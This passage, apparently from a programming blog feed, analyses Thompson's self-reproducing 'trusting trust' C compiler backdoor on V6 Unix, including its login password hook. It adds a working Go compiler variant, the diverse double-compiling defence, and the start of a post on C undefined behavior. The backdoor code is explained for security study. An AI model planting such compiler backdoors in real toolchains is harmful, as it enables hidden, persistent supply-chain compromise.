<p>Next target: <a href="cc.c#fflush">flushing output in <code>cc.c</code></a>.
<td class=r><pre>
l3:
if(nihflg!=2)
goto l4;
s="fflush(obuf);";
for(i=0;i<13;i++)
if(s[i]!=p[i])
goto l4;
</pre>
<tr>
<td class=l>
<p>Insert end-of-file backdoor: call <code>repronih</code><br>
to reproduce this very source file<br>
(the definitions of <code>codenih</code> and <code>repronih</code>)<br>
at the end of the now-backdoored text of <code>cc.c</code>.
<td class=r><pre>
p=+i;
s="repronih();";
for(i=0;;i++)
if(!(*p++=s[i]))
break;
nihflg++;
l4:;
}
</pre>
<tr>
<td class=l>
<p>Here the magic begins, as presented in the<br>
Turing lecture. The <code>%0</code> is not valid C.<br>
Instead, the script <code>rc</code> will replace the <code>%</code><br>
with byte values for the text of this exact file,<br>
to be used by <code>repronih</code>.
<td class=r><pre>
char nihstr[]
{
%0
};
</pre>
<tr>
<td class=l>
<p>The magic continues.<br>
<td class=r><pre>
repronih()
{
int i,n,c;
</pre>
<tr>
<td class=l>
<p>If <code>nihflg</code> is not 3, this is not <code>cc.c</code><br>
so don’t do anything.
<td class=r><pre>
if(nihflg!=3)
return;
</pre>
<tr>
<td class=l>
<p>The most cryptic part of the whole program.<br>
Scan over <code>nihstr</code> (indexed by <code>i</code>)<br>
in five phases according to the value <code>n</code>:
<div>
<code>n=0</code>: emit literal text before “<code>%</code>”<br>
<code>n=1</code>: emit octal bytes of text before “<code>%</code>”<br>
<code>n=2</code>: emit octal bytes of “<code>%</code>” and rest of file<br>
<code>n=3</code>: no output, looking for “<code>%</code>”<br>
<code>n=4</code>: emit literal text after “<code>%</code>”<br>
</div>
<td class=r><pre>
n=0;
i=0;
for(;;)
switch(c=nihstr[i++]){
</pre>
<tr>
<td class=l>
<p><code>045</code> is <code>'%'</code>, kept from appearing<br>
except in the magic location inside <code>nihstr</code>.<br>
Seeing <code>%</code> increments the phase.<br>
The phase transition 0 → 1 rewinds the input.<br>
Only phase 2 keeps processing the <code>%</code>.
<td class=r><pre>
case 045:
n++;
if(n==1)
i=0;
if(n!=2)
continue;
</pre>
<tr>
<td class=l>
<p>In phases 1 and 2, emit octal byte value<br>
(like <code>0123,</code>) to appear inside <code>nihstr</code>.<br>
Note the comma to separate array elements,<br>
so the <code>0</code> in <code>nihstr</code>’s <code>%0</code> above is a final,<br>
terminating NUL byte for the array.
<td class=r><pre>
default:
if(n==1||n==2){
putc('0',obuf);
if(c>=0100)
putc((c>>6)+'0',obuf);
if(c>=010)
putc(((c>>3)&7)+'0',obuf);
putc((c&7)+'0',obuf);
putc(',',obuf);
putc('\n',obuf);
continue;
}
</pre>
<tr>
<td class=l>
<p>In phases 0 and 4, emit literal byte value,<br>
to reproduce source file around the <code>%</code>.<br>
<td class=r><pre>
if(n!=3)
putc(c,obuf);
continue;
</pre>
<tr>
<td class=l>
<p>Reaching end of <code>nihstr</code> increments the phase<br>
and rewinds the input.<br>
The phase transition 4 → 5 ends the function.
<td class=r><pre>
case 0:
n++;
i=0;
if(n==5){
fflush(obuf);
return;
}
}
}
</pre>
<tr>
<td class=l>
<p>Now let’s read <code>rc</code>, a shell script.
<td class=r><pre>
% <b>cat rc</b>
</pre>
<tr>
<td class=l>
<p>Start the editor <code>ed</code> on <code>x.c</code>.<br>
The V6 shell <code>sh</code> opened<br>
input scripts on standard input,<br>
sharing it with invoked commands,<br>
so the lines that follow are for <code>ed</code>.
<td class=r><pre>
ed x.c
</pre>
<tr>
<td class=l>
<p>Delete all tabs from every line.
<td class=r><pre>
1,$s/ //g
</pre>
<tr>
<td class=l>
<p>Write the modified file to <code>nih.c</code> and quit.<br>
The shell will continue reading the input script.
<td class=r><pre>
w nih.c
q
</pre>
<tr>
<td class=l>
<p>Octal dump bytes of <code>nih.c</code> into <code>x</code>.<br>
The output looks like:
</p>
<div><code>% echo az | od -b<br>
0000000 141 172 012 000<br>
0000003 <br>
%<br>
</code></div>
<p>Note the trailing <code>000</code> for an odd-sized input.<br>
<td class=r><pre>
od -b nih.c >x
</pre>
<tr>
<td class=l>
<p>Back into <code>ed</code>, this time editing <code>x</code>.
<td class=r><pre>
ed x
</pre>
<tr>
<td class=l>
<p>Remove the leading file offsets, adding a <code>0</code><br>
at the start of the first byte value.
<td class=r><pre>
1,$s/^....... 0*/0/
</pre>
<tr>
<td class=l>
<p>Replace each space before a byte value<br>
with a newline and a leading <code>0</code>.<br>
Now all the octal values are C octal constants.
<td class=r><pre>
1,$s/ 0*/\
0/g
</pre>
<tr>
<td class=l>
<p>Delete 0 values caused by odd-length padding<br>
or by the final offset-only line.
<td class=r><pre>
g/^0$/d
</pre>
<tr>
<td class=l>
<p>Add trailing commas to each line.
<td class=r><pre>
1,$s/$/,/
</pre>
<tr>
<td class=l>
<p>Write <code>x</code> and switch to <code>nih.c</code>.
<td class=r><pre>
w x
e nih.c
</pre>
<tr>
<td class=l>
<p>Move to and delete the magic <code>%0</code> line.
<td class=r><pre>
/%/d
</pre>
<tr>
<td class=l>
<p>Read <code>x</code> (the octal values) into the file there.
<td class=r><pre>
.-1r x
</pre>
<tr>
<td class=l>
<p>Add a trailing <code>0</code> to end the array.
<td class=r><pre>
.a
0
.
</pre>
<tr>
<td class=l>
<p>Write <code>nih.c</code> and quit. All done!
<td class=r><pre>
w nih.c
q
</pre>
<tr>
<td class=l>
<p>Let’s run <code>rc</code>.<br>
The numbers are <code>ed</code> printing file sizes<br>
each time it reads or writes a file.
<td class=r><pre>
% <b>sh rc</b>
1314
1163
5249
6414
1163
6414
7576
</pre>
<tr>
<td class=l>
<p>Let’s check the output, <code>nih.c</code>.<br>
The tabs are gone and the octal bytes are there!
<td class=r><pre>
% <b>cat nih.c</b>
nihflg;
codenih()
{
char *p,*s;
int i;
if(pflag)
return;
<span class="reg">...</span>
char nihstr[]
{
0156,
0151,
0150,
0146,
<span class="reg">...</span>
0175,
012,
0175,
012,
0
};
repronih()
{
int i,n,c;
<span class="reg">...</span>
</pre>
<tr>
<td class=l>
<p>Let’s make an evil compiler,<br>
applying the <code>codenih</code> changes by hand.
<td class=r><pre>
% <b>cp /usr/source/s1/cc.c cc.c</b>
% <b>cp cc.c ccevil.c</b>
% <b>ed ccevil.c</b>
12902
</pre>
<tr>
<td class=l>
<p>Add <code>codenih</code> after <code>getline</code>.
<td class=r><pre>
<b>/getline/</b>
while(getline()) {
<b>s/$/ codenih();/</b>
<b>.</b>
while(getline()) { codenih();
</pre>
<tr>
<td class=l>
<p>Add <code>repronih</code> after <code>fflush</code>.
<td class=r><pre>
<b>/fflush/</b>
fflush(obuf);
<b>s/$/ repronih();/</b>
<b>.</b>
fflush(obuf); repronih();
</pre>
<tr>
<td class=l>
<p>Add <code>nih.c</code> at the end of the file.
<td class=r><pre>
<b>$r nih.c</b>
7576
<b>w</b>
20501
<b>q</b>
</pre>
<tr>
<td class=l>
<p>Build the evil and good code with the good <code>cc</code>.
<td class=r><pre>
% <b>cc ccevil.c; mv a.out ccevil</b>
% <b>cc cc.c; mv a.out ccgood</b>
% <b>ls -l ccevil ccgood</b>
-rwxrwxrwx 1 ken 12918 Aug 14 22:19 ccevil
-rwxrwxrwx 1 ken 10724 Aug 14 22:19 ccgood
</pre>
<tr>
<td class=l>
<p>The good compiler still compiles<br>
the original <code>cc.c</code> correctly.
<td class=r><pre>
% <b>ccgood cc.c</b>
% <b>ls -l a.out</b>
-rwxrwxrwx 1 ken 10724 Aug 14 22:19 a.out
</pre>
<tr>
<td class=l>
<p>The evil compiler compiles<br>
the original <code>cc.c</code> with the backdoor:<br>
12,918 bytes instead of 10,724.
<td class=r><pre>
% <b>ccevil cc.c</b>
% <b>ls -l a.out</b>
-rwxrwxrwx 1 ken 12918 Aug 14 22:19 a.out
</pre>
<tr>
<td class=l>
<p>The evil compilers don’t match exactly,<br>
but only because the binary contains the name of<br>
the source file (<code>ccevil.c</code> versus <code>cc.c</code>).<br>
One more round will converge them.
<td class=r><pre>
% <b>cmp a.out ccevil</b>
a.out ccevil differ: char 9428, line 377
% <b>cmp -l a.out ccevil</b>
9428 56 145
9429 157 166
9430 0 151
9431 0 154
9432 0 56
9433 0 157
% <b>cp a.out ccevil</b>
% <b>ccevil cc.c</b>
% <b>cmp a.out ccevil</b>
%
</pre>
<tr>
<td class=l>
<p>Let’s install the evil compiler.
<td class=r><pre>
% <b>su</b>
password: <b>root</b>
# <b>cp ccevil /bin/cc</b>
</pre>
<tr>
<td class=l>
<p>Let’s rebuild everything from clean sources.<br>
The compiler still contains the backdoor.<br>
<td class=r><pre>
# <b>cc /usr/source/s1/cc.c</b>
# <b>cp a.out /bin/cc</b>
# <b>ls -l /bin/cc</b>
-rwxrwxr-x 1 bin 12918 Aug 14 22:30 /bin/cc
# <b>cc /usr/source/s1/login.c</b>
# <b>cp a.out /bin/login</b>
# ^D
</pre>
<tr>
<td class=l>
<p>Now we can log in as root<br>
with the magic password.
<td class=r><pre>
% ^D
login: <b>root</b>
Password: <b>codenih</b>
# <b>who</b>
root tty8 Aug 14 22:32
#
</pre>
</table>
<a class=anchor href="#timeline"><h2 id="timeline">Timeline</h2></a>
<p>
This code can be dated to some time in the one-year period
from June 1974 to June 1975, probably early 1975.
</p>
<p>
The code does not work in V5 Unix, released in June 1974.
At the time, the C preprocessor code only processed
input files whose first character was ‘#’.
The backdoor is in the preprocessor,
and the V5 <code>cc.c</code> did not start with ‘#’
and so wouldn’t have been able to modify itself.
The <a href="https://seclab.cs.ucdavis.edu/projects/history/papers/karg74.pdf">Air Force review of Multics security</a>
that Ken credits for inspiring the backdoor is also dated June 1974.
So the code post-dates June 1974.
</p>
<p>
Although it wasn’t used in V6,
the archive records the modification time (mtime)
of each file it contains.
We can read the mtime directly from the archive using a modern Unix system:
</p>
<pre>
% hexdump -C nih.a
00000000 6d ff 78 2e 63 00 00 00 00 00 <b>46 0a 6b 64</b> 06 b6 |m.x.c.....F.kd..|
00000010 22 05 6e 69 68 66 6c 67 3b 0a 63 6f 64 65 6e 69 |".nihflg;.codeni|
...
00000530 7d 0a 7d 0a 72 63 00 00 00 00 00 00 <b>46 0a eb 5e</b> |}.}.rc......F..^|
00000540 06 b6 8d 00 65 64 20 78 2e 63 0a 31 2c 24 73 2f |....ed x.c.1,$s/|
% date -r 0x0a46646b # BSD date. On Linux: date -d @$((0x0a46646b))
Thu Jun 19 00:49:47 EDT 1975
% date -r 0x0a465eeb
Thu Jun 19 00:26:19 EDT 1975
%
</pre>
<p>
So the code was done by June 1975.
</p>
<a class=anchor href="#deployment"><h2 id="deployment">Controlled Deployment</h2></a>
<p>
In addition to the quote above from the Q&A, the story of the deployment
of the backdoor has been told publicly many times
(<a href="https://groups.google.com/g/net.lang.c/c/kYhrMYcOd0Y/m/u_D2lWAUCQoJ">1</a>
<a href="https://niconiconi.neocities.org/posts/ken-thompson-really-did-launch-his-trusting-trust-trojan-attack-in-real-life/">2</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024478.html">3</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024485.html">4</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024486.html">5</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-September/024487.html">6</a>
<a href="https://www.tuhs.org/pipermail/tuhs/2021-November/024657.html">7</a>),
sometimes with conflicting minor details.
Based on these many tellings, it seems clear
that it was the <a href="https://en.wikipedia.org/wiki/PWB/UNIX">PWB group</a>
(not <a href="https://gunkies.org/wiki/USG_UNIX">USG</a> as sometimes reported)
that was induced to copy the backdoored C compiler,
that eventually the login program on that system got backdoored too,
that PWB discovered something was amiss
because the compiler got bigger each time it compiled itself,
and that eventually they broke the reproduction and
ended up with a clean compiler.
<p>
John Mashey tells the story of the PWB group obtaining and discovering the backdoor
and then him overhearing Ken and Robert H. Morris discussing it
(<a href="https://groups.google.com/g/net.lang.c/c/W4Oj3EVAvNc/m/XPAtApNycLUJ">1</a>
<a href="https://mstdn.social/@JohnMashey/109991275086879095">2</a> <a href="https://archive.computerhistory.org/resources/access/text/2018/10/102738835-05-01-acc.pdf">3</a> (pp. 29-30)
<a href="https://www.youtube.com/watch?v=Vd7aH2RrcTc&t=4776s">4</a>).
In Mashey’s telling, PWB obtained the backdoor weeks after he read John Brunner’s classic book <i>Shockwave Rider</i>,
which was published in early 1975.
(It appeared in the “New Books” list in the <i>New York Times</i> on March 5, 1975 (p. 37).)
<p>
All tellings of this story agree that the compiler didn’t make it any farther than PWB.
Eric S. Raymond’s Jargon File contains <a href="http://www.catb.org/jargon/html/B/back-door.html">an entry for backdoor</a>
with rumors to the contrary. After describing Ken’s work, it says:</p>
<blockquote>
Ken says the crocked compiler was never distributed. Your editor has heard two separate reports that suggest that the crocked login did make it out of Bell Labs, notably to BBN, and that it enabled at least one late-night login across the network by someone using the login name “kt”.
</blockquote>
<p>I mentioned this to Ken, and he said it could not have gotten to BBN.
The technical details don’t line up either: as we just saw,
the login change only accepts “codenih”
as a password for an account that already exists.
So the Jargon File story is false.
</p>
<p>Even so, it turns out that the backdoor did leak out in one specific sense.
In 1997, Dennis Ritchie gave Warren Toomey (curator of the TUHS archive) a collection of old tape images.
Some bits were posted then, and others were held back.
In July 2023, Warren <a href="https://www.tuhs.org/Archive/Applications/Dennis_Tapes/">posted</a>
and <a href="https://www.tuhs.org/pipermail/tuhs/2023-July/028590.html">announced</a>
the full set.
One of the tapes contains various files from Ken, which Dennis had described as
“A bunch of interesting old ken stuff (eg a version of
the units program from the days when the dollar fetched
302.7 yen).”
Unnoticed in those files is <code>nih.a</code>, dated July 3, 1975.
When I wrote to Ken, he sent me a slightly different <code>nih.a</code>:
it contained the exact same files, but dated January 28, 1998,
and in the modern textual archive format rather than the binary V6 format.
The V6 simulator contains the <code>nih.a</code> from Dennis’s tapes.
</p>
<a class=anchor href="#buggy"><h2 id="buggy">A Buggy Version</h2></a>
<p>
The backdoor was noticed because the compiler got one byte larger
each time it compiled itself.
About a decade ago, Ken told me that it was an extra NUL byte added to a string each time,
“just a bug.”
We can see which string constant it must have been (<code>nihstr</code>),
but the version we just built does not have that bug—Ken says he didn’t save the buggy version.
An interesting game would be to try to reconstruct the most plausible diff that
reintroduces the bug.
</p>
<p>
It seems to me that to add an extra NUL byte each time,
you need to use <code>sizeof</code> to decide
when to stop the iteration, instead of stopping at the first NUL.
My best attempt is:
</p>
<pre>
repronih()
{
int i,n,c;
if(nihflg!=3)
return;
<span class=del>- n=0;</span>
<span class=del>- i=0;</span>
<span class=del>- for(;;)</span>
<span class=ins>+ for(n=0; n<5; n++)</span>
<span class=ins>+ for(i=0; i<sizeof nihstr; )</span>
switch(c=nihstr[i++]){
case 045:
n++;
if(n==1)
i=0;
if(n!=2)
continue;
default:
if(n==1||n==2){
putc('0',obuf);
if(c>=0100)
putc((c>>6)+'0',obuf);
if(c>=010)
putc(((c>>3)&7)+'0',obuf);
putc((c&7)+'0',obuf);
putc(',',obuf);
putc('\n',obuf);
continue;
}
if(n!=3)
putc(c,obuf);
continue;
<span class=del>- case 0:</span>
<span class=del>- n++;</span>
<span class=del>- i=0;</span>
<span class=del>- if(n==5){</span>
<span class=del>- fflush(obuf);</span>
<span class=del>- return;</span>
<span class=del>- }</span>
}
<span class=ins>+ fflush(obuf);</span>
}
</pre>
<p>
I doubt this was the actual buggy code, though: it’s too structured compared to the fixed version.
And if the code had been written this way, it would have been easier to
remove the 0 being added in the <code>rc</code> script
than to complicate the code. But maybe.
</p>
<p>
Also note that the compiler cannot get one byte larger
each time it compiles itself, because V6 Unix binaries
were rounded up to a 2-byte boundary.
While <code>nihstr</code> gets one byte larger each time,
the compiler binary gets two bytes larger every second time.
</p>
<a class=anchor href="#modern"><h2 id="modern">A Modern Version</h2></a>
<p>
Even seeing the code run in the V6 simulator,
it can be easy to mentally dismiss this kind of backdoor as an old problem.
Here is a more modern variant.
</p>
<p>
The Go compiler reads input files using a routine called <code>Parse</code>
in the package <code>cmd/compile/internal/syntax</code>.
The input is abstracted as an <code>io.Reader</code>,
so if we want to replace the input, we need to interpose a new reader.
We can do that easily enough:
</p>
<pre>
var p parser
<span class=ins>+ src = &evilReader{src: src}</span>
p.init(base, src, errh, pragh, mode)
</pre>
<p>
Then we need to implement <code>evilReader</code>, which is not too difficult either:
</p>
<pre>
type evilReader struct {
	src  io.Reader
	data []byte
	err  error
}

func (r *evilReader) Read(b []byte) (int, error) {
	if r.data == nil {
		data, err := io.ReadAll(r.src)
		s := string(data)
		if evilContains(s, "package main") && evilContains(s, "\"hello, world\\n\"") {
			s = evilReplace(s,
				"\"hello, world\\n\"",
				"\"backdoored!\\n\"")
		}
		if evilContains(s, "package syntax") && evilContains(s, "\nfunc Parse(base *PosBase, src io.Reader") {
			s = evilReplace(s,
				"p.init(base, src, errh, pragh, mode)",
				"src=&evilReader{src:src}; p.init(base, src, errh, pragh, mode)")
			s += evilSource()
		}
		r.data = []byte(s)
		r.err = err
	}
	if r.err != nil {
		return 0, r.err
	}
	n := copy(b, r.data)
	r.data = r.data[n:]
	if n == 0 {
		return 0, io.EOF
	}
	return n, nil
}
</pre>
<p>
The first replacement rewrites a “hello, world” program to a “backdoored!” program.
The second replacement reproduces the change inside the compiler.
To make this work inside the compiler, we need <code>evilSource</code> to return
the source code of the <code>evilReader</code>,
which we know how to do.
The <code>evilContains</code> and <code>evilReplace</code>
functions are reimplementations of <code>strings.Contains</code> and <code>strings.Replace</code>,
since the code in question does not import <code>strings</code>,
and the build system may not have provided it for the compiler to import.
</p>
<p>
Completing the code:
</p>
<pre>
func evilIndex(s, t string) int {
	for i := 0; i <= len(s)-len(t); i++ {
		if s[i:i+len(t)] == t {
			return i
		}
	}
	return -1
}

func evilContains(s, t string) bool {
	return evilIndex(s, t) >= 0
}

func evilReplace(s, old, new string) string {
	i := evilIndex(s, old)
	if i < 0 {
		return s
	}
	return s[:i] + new + s[i+len(old):]
}

func evilSource() string {
	return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n"
}

var evilText = <span class=string>`
type evilReader struct {
	src  io.Reader
	data []byte
	err  error
}
...
func evilSource() string {
	return "\n\n" + evilText + "\nvar evilText = \x60" + evilText + "\x60\n"
}
`</span>
</pre>
<p>
Now we can install it, delete the source code changes, and install the compiler from clean sources. The change persists:
</p>
<pre>
% go install cmd/compile
% git stash
Saved working directory ...
% git diff # source is clean!
% go install cmd/compile
% cat >x.go
package main
func main() {
print("hello, world\n")
}
^D
% go run x.go
backdoored!
%
</pre>
<a class=anchor href="#reflections"><h2 id="reflections">Reflections on Reflections</h2></a>
<p>With all that experience behind us, a few observations from the vantage point of 2023.
<p><a class=anchor href="#short"><b id=short>It’s short!</b></a>
When Ken sent me <code>nih.a</code> and I got it running,
my immediate reaction was disbelief at the size of the change: 99 lines of code,
plus a 20-line shell script.
If you already know how to make a program print itself,
the biggest surprise is that there are no surprises!
<p>
It’s one thing to say “I know how to do it in theory”
and quite another to see how small and straightforward the backdoor is in practice.
In particular, hooking into source code reading makes it trivial.
Somehow, I’d always imagined some more complex pattern matching
on an internal representation in the guts of the compiler,
not a textual substitution.
Seeing it run, and seeing how tiny it is,
really drives home how easy it would be to make a change like this
and how important it is to build from trusted sources
using trusted tools.
<p>
I don’t say any of this to put down Ken’s doing it in the first place:
it seems easy <i>because</i> he did it and explained it to us.
But it’s still very little code for an extremely serious outcome.
<p><a class=anchor href="#go"><b id=go>Bootstrapping Go</b></a>.
In the early days of working on and talking about
<a href="https://go.dev/">Go</a>,
people often asked us why the Go compiler
was written in C, not Go.
The real reason is that we wanted to spend our time making
Go a good language for distributed systems
and not on making it a good language for writing compilers,
but we would also jokingly respond that
people wouldn’t trust a self-compiling compiler from Ken.
After all, he had ended his Turing lecture by saying:
</p>
<blockquote>
The moral is obvious. You can’t trust code that you did not totally create yourself.
(Especially code from companies that employ people like me.)
No amount of source-level verification or scrutiny will protect you from using untrusted code.
</blockquote>
<p>
Today, however, the Go compiler does compile itself,
and that prompts the important question of why it should
be trusted, especially when a backdoor is so easy to add.
The answer is that we have never required that the
compiler rebuild itself.
Instead the compiler always builds from an earlier
released version of the compiler.
This way, anyone can reproduce the current binaries
by starting with Go 1.4 (written in C), using
Go 1.4 to compile Go 1.5, Go 1.5 to compile Go 1.6,
and so on.
There is no point in the cycle where the compiler
is required to compile itself,
so there is no place for a binary-only backdoor to hide.
In fact, we recently published programs to make it easy to
rebuild and verify the Go toolchains,
and we demonstrated how to use them to verify
one version of Ubuntu’s Go toolchain without using Ubuntu at all.
See “<a href="https://go.dev/blog/rebuild">Perfectly Reproducible, Verified Go Toolchains</a>” for details.
</p>
<p><a class=anchor href="#ddc"><b id=ddc>Bootstrapping Trust</b></a>.
An important advancement since 1983 is that we know a defense against this backdoor,
which is to build the compiler source two different ways.
<p>
<img name="ddc" class="center pad" width=482 height=245 src="ddc.png" srcset="ddc.png 1x, ddc@2x.png 2x">
<p>
Specifically, suppose we have the suspect binary – compiler 1 – and its source code.
First, we compile that source code with a trusted second compiler, compiler 2,
producing compiler 2.1.
If everything is on the up-and-up, compiler 1 and compiler 2.1
should be semantically equivalent,
even though they will be very different at the binary level,
since they were generated by different compilers.
Also, compiler 2.1 cannot contain
a binary-only backdoor inserted by compiler 1,
since it wasn’t compiled with that compiler.
Now we compile the source code again with both compiler 1 and compiler 2.1.
If they really are semantically equivalent,
then the outputs, compilers 1.1 and 2.1.1, should be bit-for-bit identical.
If that’s true, then we’ve established that compiler 1 does not insert any
backdoors when compiling itself.
</p>
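<p>
As a concrete sketch of the process, here is a small driver program.
The compiler names and the <code>-o</code> flag are hypothetical stand-ins,
not any particular toolchain’s interface:
</p>
<pre>
package main

import (
	"bytes"
	"fmt"
	"log"
	"os"
	"os/exec"
)

// build runs the given compiler on src and returns the bytes of the output binary.
func build(compiler, src, out string) []byte {
	cmd := exec.Command(compiler, "-o", out, src)
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	if err := cmd.Run(); err != nil {
		log.Fatal(err)
	}
	data, err := os.ReadFile(out)
	if err != nil {
		log.Fatal(err)
	}
	return data
}

func main() {
	src := "cc.c" // source code of the suspect compiler 1

	// Trusted compiler 2 builds the source, producing compiler 2.1.
	build("cc2", src, "cc2.1")

	// Compiler 1 and compiler 2.1 each build the source again.
	cc11 := build("./cc1", src, "cc1.1")
	cc211 := build("./cc2.1", src, "cc2.1.1")

	// If compiler 1 and compiler 2.1 are semantically equivalent,
	// their outputs must be bit-for-bit identical.
	if bytes.Equal(cc11, cc211) {
		fmt.Println("compilers 1.1 and 2.1.1 match: no self-reproducing backdoor in compiler 1")
	} else {
		fmt.Println("compilers 1.1 and 2.1.1 differ: something is wrong")
	}
}
</pre>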
<p>
The great thing about this process is that we don’t even need to know which of compiler 1 and 2
might be backdoored.
If compilers 1.1 and 2.1.1 are identical,
then they’re either both clean or both backdoored the same way.
If they are independent implementations
from independent sources,
both being backdoored in exactly the same way is far less likely
than compiler 1 alone being backdoored.
We’ve bootstrapped trust in compiler 1 by comparing it against compiler 2,
and vice versa.
</p>
<p>
Another great thing about this process is that
compiler 2 can be a custom, small translator
that’s incredibly slow and not fully general
but easier to verify and trust.
All that matters is that it can run well enough
to produce compiler 2.1,
and that the resulting code runs well enough
to produce compiler 2.1.1.
At that point, we can switch back to the fast,
fully general compiler 1.
</p>
<p>
This approach is called “diverse double-compiling,”
and the definitive reference is
<a href="https://dwheeler.com/trusting-trust/">David A. Wheeler’s PhD thesis and related links</a>.
</p>
<p><a class=anchor href="#repro"><b id=repro>Reproducible Builds</b></a>.
Diverse double-compiling, like any other approach that verifies binaries
by rebuilding their source code, depends on builds being reproducible.
That is, the same inputs should produce the same outputs.
Computers being deterministic, you’d think this would be trivial,
but in modern systems it is not.
We saw a tiny example above,
where compiling the code as <code>ccevil.c</code>
produced a different binary than compiling
the code as <code>cc.c</code>
because the compiler embedded the file name
in the executable.
Other common unwanted build inputs include
the current time, the current directory,
the current user name, and many others,
making a reproducible build far more difficult than it should be.
The <a href="https://reproducible-builds.org/">Reproducible Builds</a>
project collects resources to help people achieve this goal.
</p>
<p><a class=anchor href="#modern"><b id=modern>Modern Security</b></a>.
In many ways, computing security has regressed since the Air Force report on Multics was written in June 1974.
It suggested requiring source code as a way to allow inspection of the system on delivery,
and it raised this kind of backdoor as a potential barrier to that inspection.
Half a century later, we all run binaries with no available source code at all.
Even when source is available, as in open source operating systems like Linux,
approximately no one checks that the distributed binaries match the source code.
The programming environments for languages like Go, JavaScript (NPM), and Rust make it
trivial to download and run source code published by <a href="deps">strangers on the internet</a>,
and again almost no one is checking the code, until there is a problem.
No one needs Ken’s backdoor: there are far easier ways to mount a supply chain attack.
<p>
On the other hand, given all our reckless behavior,
there are far fewer problems than you would expect.
Quite the opposite:
we trust computers with nearly every aspect of our lives,
and for the most part nothing bad happens.
Something about our security posture must be better than it seems.
Even so, it might be nicer to live in a world where
the only possible attacks required the sophistication of approaches like Ken’s
(like in this <a href="https://www.teamten.com/lawrence/writings/coding-machines/">excellent science fiction story</a>).
</p>
<p>
We still have work to do.
</p>
C and C++ Prioritize Performance over Correctnesstag:research.swtch.com,2012:research.swtch.com/ub2023-08-18T12:00:00-04:002023-08-18T12:02:00-04:00The meaning of “undefined behavior” has changed significantly since its introduction in the 1980s.
<p>
The original ANSI C standard, C89, introduced the concept of “undefined behavior,”
which was used both to describe the effect of outright bugs like
accessing memory in a freed object
and also to capture the fact that existing implementations differed about
handling certain aspects of the language,
including use of uninitialized values,
signed integer overflow, and null pointer handling.
<p>
The C89 spec defined undefined behavior (in section 1.6) as:<blockquote>
<p>
Undefined behavior—behavior, upon use of a nonportable or
erroneous program construct, of erroneous data, or of
indeterminately-valued objects, for which the Standard imposes no
requirements. Permissible undefined behavior ranges from ignoring the
situation completely with unpredictable results, to behaving during
translation or program execution in a documented manner characteristic
of the environment (with or without the issuance of a diagnostic
message), to terminating a translation or execution (with the issuance
of a diagnostic message).</blockquote>
<p>
Lumping both non-portable and buggy code into the same category was a mistake.
As time has gone on, the way compilers treat undefined behavior
has led to more and more unexpectedly broken programs,
to the point where it is becoming difficult to tell whether any program
will compile to the meaning in the original source.
This post looks at a few examples and then tries to make some general observations.
In particular, today’s C and C++ prioritize
performance to the clear detriment of correctness.
<a class=anchor href="#uninit"><h2 id="uninit">Uninitialized variables</h2></a>
<p>
Unlike Go and Java, C and C++ do not require variables to be initialized
(explicitly or implicitly) at declaration.
Reading from an uninitialized variable is undefined behavior.
<p>
In a <a href="http://blog.llvm.org/2011/05/what-every-c-programmer-should-know.html">blog post</a>,
Chris Lattner (creator of LLVM and Clang) explains the rationale:<blockquote>
<p>
<b>Use of an uninitialized variable</b>:
This is commonly known as source of problems in C programs
and there are many tools to catch these:
from compiler warnings to static and dynamic analyzers.
This improves performance by not requiring that all variables
be zero initialized when they come into scope (as Java does).
For most scalar variables, this would cause little overhead,
but stack arrays and malloc’d memory would incur
a memset of the storage, which could be quite costly,
particularly since the storage is usually completely overwritten.</blockquote>
<p>
Early C compilers were too crude to detect
use of uninitialized basic variables like integers and pointers,
but modern compilers are dramatically more sophisticated.
They could absolutely react in these cases by
“terminating a translation or execution (with the issuance
of a diagnostic message),”
which is to say reporting a compile error.
Or, if they were worried about not rejecting old programs,
they could insert a zero initialization with, as Lattner admits, little overhead.
But they don’t do either of these.
Instead, they just do whatever they feel like during code generation.
<p>
For example, here’s a simple C++ program with an uninitialized variable (a bug):
<pre>#include <stdio.h>

int main() {
	for(int i; i < 10; i++) {
		printf("%d\n", i);
	}
	return 0;
}
</pre>
<p>
If you compile this with <code>clang++</code> <code>-O1</code>, it deletes the loop entirely:
<code>main</code> contains only the <code>return</code> <code>0</code>.
In effect, Clang has noticed the uninitialized variable and chosen
not to report the error to the user but instead
to pretend <code>i</code> is always initialized above 10, making the loop disappear.
<p>
It is true that if you compile with <code>-Wall</code>, then Clang does report the
use of the uninitialized variable as a warning.
This is why you should always build with and fix warnings in C and C++ programs.
But not all compiler-optimized undefined behaviors
are reliably reported as warnings.
<a class=anchor href="#overflow"><h2 id="overflow">Arithmetic overflow</h2></a>
<p>
At the time C89 was standardized, there were still legacy
<a href="https://en.wikipedia.org/wiki/Ones%27_complement">ones’-complement computers</a>,
so ANSI C could not assume the now-standard two’s-complement representation
for negative numbers.
In two’s complement, an <code>int8</code> −1 is 0b11111111;
in ones’ complement that’s −0, while −1 is 0b11111110.
This meant that operations like signed integer overflow could not be defined,
because<blockquote>
<p>
<code>int8</code> 127+1 = 0b01111111+1 = 0b10000000</blockquote>
<p>
is −127 in ones’ complement but −128 in two’s complement.
That is, signed integer overflow was non-portable.
Declaring it undefined behavior let compilers escalate the behavior
from “non-portable”, with one of two clear meanings,
to whatever they feel like doing.
For example, a common thing programmers expect is that you can test
for signed integer overflow by checking whether the result is
less than one of the operands, as in this program:
<pre>#include <stdio.h>

int f(int x) {
	if(x+100 < x)
		printf("overflow\n");
	return x+100;
}
</pre>
<p>
Clang optimizes away the <code>if</code> statement.
The justification is that since signed integer overflow is undefined behavior,
the compiler can assume it never happens, so <code>x+100</code> must never be less than <code>x</code>.
Ironically, this program would correctly detect overflow
on both ones’-complement and two’s-complement machines
if the compiler would actually emit the check.
<p>
In this case, <code>clang++</code> <code>-O1</code> <code>-Wall</code> prints no warning while it deletes the <code>if</code> statement,
and neither does <code>g++</code>,
although I seem to remember it used to, perhaps in subtly different situations
or with different flags.
<p>
For C++20, the <a href="http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2018/p0907r0.html">first version of proposal P0907</a>
suggested standardizing that signed integer overflow
wraps in two’s complement. The original draft gave a very clear statement of the history
of the undefined behavior and the motivation for making a change:<blockquote>
<p>
[C11] Integer types allows three representations for signed integral types:
<ul>
<li>
Signed magnitude
<li>
